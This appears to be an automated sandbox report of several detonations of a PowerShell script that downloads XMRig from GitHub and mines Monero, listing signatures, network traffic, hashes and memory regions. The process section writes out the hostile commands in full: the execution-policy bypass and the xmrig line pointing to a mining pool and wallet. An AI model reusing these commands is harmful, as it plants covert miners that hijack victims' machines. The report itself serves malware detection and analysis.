| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 388 wrote to memory of 904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 388 wrote to memory of 904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/388-0-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp
memory/388-1-0x00000258FCEE0000-0x00000258FCF02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gxx1sy0n.jrn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/388-10-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/388-11-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/388-13-0x00000258FCFA0000-0x00000258FCFB2000-memory.dmp
memory/388-14-0x00000258FCF90000-0x00000258FCF9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/904-45-0x000002419AEC0000-0x000002419AEE0000-memory.dmp
memory/904-46-0x000002419AF10000-0x000002419AF30000-memory.dmp
memory/904-47-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/388-48-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/904-50-0x000002422F3B0000-0x000002422F3D0000-memory.dmp
memory/904-49-0x000002422F390000-0x000002422F3B0000-memory.dmp
memory/904-51-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/388-52-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp
memory/904-53-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-54-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-55-0x000002422F390000-0x000002422F3B0000-memory.dmp
memory/904-56-0x000002422F3B0000-0x000002422F3D0000-memory.dmp
memory/904-57-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-58-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-59-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-60-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-61-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-62-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-63-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-64-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-65-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-66-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-67-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-68-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-69-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-70-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-71-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-72-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-73-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-74-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-75-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-76-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-77-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-78-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-79-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-80-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-81-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-82-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-83-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-84-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-85-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-86-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-87-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-88-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-89-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-90-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-91-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-92-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-93-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-94-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-95-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-96-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-97-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-98-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-99-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-100-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-101-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-102-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-103-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-104-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-105-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-106-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-107-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-108-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-109-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-110-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-111-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-112-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-113-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-114-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-115-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:16
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3588 wrote to memory of 920 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3588 wrote to memory of 920 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
Files
memory/3588-0-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/3588-6-0x000001D868E90000-0x000001D868EB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jsy3faf3.1gj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3588-11-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-12-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-14-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-15-0x000001D869000000-0x000001D869012000-memory.dmp
memory/3588-16-0x000001D868E60000-0x000001D868E6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/920-47-0x0000025011C30000-0x0000025011C50000-memory.dmp
memory/920-48-0x0000025011D90000-0x0000025011DB0000-memory.dmp
memory/920-49-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-50-0x0000025011DB0000-0x0000025011DD0000-memory.dmp
memory/920-52-0x0000025011DD0000-0x0000025011DF0000-memory.dmp
memory/3588-51-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-54-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/920-53-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/3588-55-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/920-56-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-58-0x0000025011DB0000-0x0000025011DD0000-memory.dmp
memory/920-57-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-59-0x0000025011DD0000-0x0000025011DF0000-memory.dmp
memory/920-60-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-61-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-62-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-63-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-64-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-65-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-66-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-67-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-68-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-69-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-70-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-71-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-72-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-73-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-74-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-75-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-76-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-77-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-78-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-79-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-80-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-81-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-82-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-83-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-84-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-85-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-86-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-87-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-88-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-89-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-90-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-91-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-92-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-93-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-94-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-95-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-96-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-97-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-98-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-99-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-100-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-101-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-102-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-103-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-104-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-105-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-106-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-107-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-108-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-109-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-110-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-111-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-112-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-113-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-114-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-115-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-116-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-117-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-118-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:16
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 748 wrote to memory of 4464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 748 wrote to memory of 4464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
